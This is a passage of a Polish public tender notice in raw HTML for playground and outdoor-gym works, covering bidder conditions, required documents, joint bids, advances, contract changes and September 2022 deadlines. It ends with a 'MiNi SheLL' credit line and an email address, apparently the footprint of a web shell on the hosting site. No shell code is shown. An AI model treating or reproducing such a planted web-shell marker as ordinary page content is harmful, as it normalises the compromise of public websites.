podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy zgodnie z art. 57 ustawy Pzp, którzy:<br/>1)	nie podlegają wykluczeniu;<br/>2)	spełniają warunki udziału w postępowaniu, o ile zostały one określone przez zamawiającego w ogłoszeniu o zamówieniu.<br/>2.	Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia musi spełniać warunki udziału w postępowaniu dotyczące:<br/>1)	Warunek zdolności do występowania w obrocie gospodarczym, zostanie uznany za spełniony, gdy Wykonawca wykaże, że:<br/>Zamawiający nie określa warunku w tym zakresie,<br/>2)	warunek uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, zostanie uznany za spełniony, gdy Wykonawca wykaże, że:<br/>Zamawiający nie określa warunku w tym zakresie,<br/>3)	warunek sytuacji ekonomicznej lub finansowej, zostanie uznany za spełniony, gdy Wykonawca wykaże, że:<br/>Zamawiający nie określa warunku w tym zakresie<br/>4)	warunek zdolności technicznej lub zawodowej zostanie uznany za spełniony, gdy Wykonawca wykaże, że:<br/>Część I:<br/>a)	w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedną robotę budowlaną polegającą na budowie i/lub przebudowie i/lub rozbudowie i/lub modernizacji placu zabaw i/lub siłowni zewnętrznej o wartości robót minimum 400.000,00 zł brutto realizowanej w ramach jednego kontraktu. Zamawiający uzna za spełnione jeżeli wykonawca realizował roboty w formule dostaw z montażem.<br/>b)	dysponuje osobą zdolną do wykonania zamówienia tj. co najmniej: <br/>- kierownikiem budowy/ robót posiadającym uprawnienia budowlane w specjalności konstrukcyjno budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów;<br/><br/>Część II: <br/><br/>a)	w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedną robotę budowlaną polegającą na budowie i/lub przebudowie i/lub rozbudowie i/lub modernizacji placu zabaw i/lub siłowni zewnętrznej o wartości robót minimum 300.000,00 zł brutto realizowanej w ramach jednego kontraktu. Zamawiający uzna za spełnione jeżeli wykonawca realizował roboty w formule dostaw z montażem.<br/>b)	dysponuje osobą zdolną do wykonania zamówienia tj. co najmniej: <br/>- kierownikiem budowy/ robót posiadającym uprawnienia budowlane w specjalności konstrukcyjno budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej <br/>2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;3) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, 4) Odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, <br/>1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast:<br/>1)	zaświadczenia, o którym mowa w części VI ust. 6 pkt 2 SWZ <br/>2)	zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o którym mowa w części VI ust. 6 pkt 3 SWZ 3) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w części VI ust. 6 pkt 4 SWZ - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a)nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,<br/>b)	nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. 2. Dokumenty, o których mowa w o którym mowa w części VI ust. 6 pkt 2-4 SWZ powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. 3. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w o których mowa w części VI ust. 6 pkt 4 SWZ , lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis ust. 2 rozporządzenia z dnia 30.12.2020 r. w sprawie podmiotowych środków dowodowych, jakich może żądać zamawiający od wykonawcy stosuje się...</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; sporządzonego zgodnie z wzorem stanowiącym załącznik nr 3 do SWZ - jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył,<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; sporządzonego zgodnie z wzorem stanowiącym załącznik nr 4 a-b do SWZ (odpowiedni dla danej części zamówienia)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4. Wykonawcy zobowiązani są wraz z ofertą złożyć następujące dokumenty oraz oświadczenia:<br/>1)Formularz ofertowy - wypełniony i podpisany przez wykonawcę – Załącznik nr 1 do SWZ;<br/>W formularzu ofertowym, wykonawca ma obowiązek:<br/>a) poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego;<br/>b) wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>c) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>d) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.<br/>2)oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu, w zakresie wskazanym przez zamawiającego zgodnie z art. 125 ust. 1 – załącznik nr 2 do SWZ ;<br/>3) Zobowiązanie innego podmiotu– załącznik nr 6 (jeżeli dotyczy)<br/>4) Dokumenty, z których wynika prawo do podpisania oferty. Oferta powinna być podpisana przez osoby uprawnione do reprezentowania wykonawcy. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do reprezentowania, Zamawiający żąda od wykonawcy odpisu lub informacji z KRS, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>5. Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem kwalifikowanym, zaufanym lub osobistym. Aby uniknąć wątpliwości Zamawiający wskazuje, że nie spełnia wymogów o jakich mowa w art. 63 ust. 2 PZP oświadczenie w formie podpisanego własnoręcznie skanu, nieopatrzonego podpisem kwalifikowanym albo podpisem zaufanym lub osobistym.<br/>6. Oferta powinna być sporządzona w języku polskim. Dokumenty składające się na ofertę sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski. Każdy dokument składający się na ofertę powinien być czytelny.<br/>7. Zaleca się aby każdy dokument zawierający tajemnice przedsiębiorstwa został zamieszczony w odrębnym pliku<br/>8. Przed upływem terminu składania ofert, Wykonawca może wprowadzić zmiany do złożonej oferty lub wycofać ofertę. W celu dokonania zmian w złożonej ofercie lub wycofania oferty należy postępować zgodnie z instrukcją użytkownika zamieszczona na Platformie.<br/>9. Wszystkie koszty związane z uczestnictwem w postępowaniu, w szczególności z przygotowaniem i złożeniem ofert ponosi wykonawca składający ofertę. Zamawiający nie przewiduje w tym zakresie zwrotu kosztów.<br/>10. Na wezwanie zamawiającego w trakcie oceny i badania ofert Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia:<br/>1) Aktualne zaświadczenie z ZUS, o którym mowa w Części VI SWZ;<br/>2) Aktualne zaświadczenie z Urzędu Skarbowego, o którym mowa w Części VI SWZ;<br/>3) Potwierdzenie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej zgodnie z opisanym warunkiem w Części V pkt 2.3.<br/>4) Wykaz robót – załącznik nr 3 do SWZ;<br/>5) Wykaz osób – załącznik nr 4 do SWZ;<br/>6) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów – załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>11. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do ich reprezentowania albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>12. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w ust. 1 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>13. Zgodnie z art. 114 ustawy Pzp warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>14. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>15. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>16. W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy , wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>17. W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1) Warunek udziału w postępowaniu, określone przez Zamawiającego w części V ust. 2 SWZ musi być spełniony przez wykonawców łącznie;<br/>2) Brak podstaw do wykluczenia z postępowania musi zostać wykazany przez każdego z wykonawców.<br/>18. W przypadku wspólnego ubiegania się o udzielenie zamówienia oraz gdy wykonawca polega na zdolnościach innych podmiotów na zasadach określonych w art. 118 ust. 1 ustawy Prawo zamówień publicznych, wymóg wykonania dwóch zamówień winien wykazać samodzielnie co najmniej jeden wykonawca. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Strony postanawiają, że rozliczenie za wykonanie umowy odbędzie się jedną fakturą zaliczkową obejmującą 2% wynagrodzenia brutto wskazanego w § 9 ust. 2 umowy oraz jedną fakturą końcową obejmującą 98% wynagrodzenia brutto wskazanego w § 9 ust. 2 umowy.<br/>2.	Wypłata zaliczki, o której mowa w ust. 1 odbywać się będzie na podstawie faktury zaliczkowej wystawionej i doręczonej w terminie nie wcześniej niż 30 dni od daty podpisania umowy i nie później niż do 15.12.2022r. Zapłata za ww. fakturę nastąpi w terminie 30 dni od daty jej doręczenia Zamawiającemu, na konto bankowe Wykonawcy wskazane w fakturze.<br/>3.	Faktura zaliczkowa i faktura końcowa wystawione zostaną zgodnie z art. 106f ustawy o podatku VAT. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w postaci aneksu, pod rygorem nieważności takiej zmiany. Zamawiający oprócz przypadków opisanych w art. 454-455ustawy Pzp przewidział katalog zmian umowy, na które mogą powoływać się strony niniejszej umowy. 2.	Katalog zmian umowy:<br/>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonał wyboru Wykonawcy, o którym mowa w umowie w przypadku wystąpienia niżej wymienionych okoliczności w trakcie realizacji przedmiotowej umowy:<br/>a)	Wystąpienia opadów atmosferycznych uniemożliwiających prowadzenie robót budowlanych, np. kilkudniowe opady; b)	Wystąpienie niskich temperatur uniemożliwiających prowadzenie robót budowlanych lub bardzo wysokich temperatur powyżej 35 stopni;c)	siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności, lub takiego, którego przewidzenie skutków nie było możliwe w momencie zawarcia umowy w tym w szczególności stanu zagrożenia epidemiologicznego, bądź epidemii. d)	zmiany będących następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury, w szczególności: przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma – typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.;<br/>e)	odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa udostępnienia terenu przez właścicieli nieruchomości do celów realizacji inwestycji;<br/>f)	kolizji z równolegle prowadzonymi inwestycjami przez Zamawiającego;<br/>g)	innych przyczyn zewnętrznych niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową,<br/>h)	w przypadku przedłużającej się procedury przetargowej,<br/>i)	konieczność usunięcia błędów w dokumentacji projektowej, wprowadzenia zmian w dokumentacji projektowej.<br/>j)	Zmiany związane z uzgodnieniami roboczymi z Lubelskim Konserwatorem Zabytków na etapie budowy;<br/>3.	Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:<br/>a)	zmiana osób, za pomocą których Wykonawca i Zamawiający realizuje przedmiot umowy na inne spełniające warunki określone w SWZ np. osób z uprawnieniami budowlanymi; b)	zmiana osób podanych w ofercie wykonawcy, przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy (zmiana jest możliwa na osoby spełniające wymogi SWZ, a dla skutecznej zmiany niezbędne jest uzyskanie pisemnej zgody Zamawiającego na zaproponowaną osobę dotyczy osób z uprawnieniami do kierowania robotami budowlanymi);<br/>c)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SWZ;<br/>d)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami <br/>e)	zmiany uzasadnione okolicznościami, o których mowa w art. 357 §1 Kodeksu cywilnego; f)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy / ograniczenie zakresu zamówienia maksymalnie do 30 % wartości przedmiotu umowy; g)	zmiana harmonogramu rzeczowo finansowego robót związana z aktualizacją przerobu Wykonawcy lub związana z dostosowaniem zakresu finansowego do budżetu Zamawiającego, np. zwiększenie przerobu w danym roku w związku z możliwością Zamawiającego w zakresie zwiększenia zaplanowanego przerobu;<br/>h)	zmiany uzasadnione wytycznymi podmiotu dofinansowującego zadania inwestycyjne; i) w zakresie zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w Pzp, ...<br/>szczegóły w zał nr 7a-b do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">pzp.opolelubelskie.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com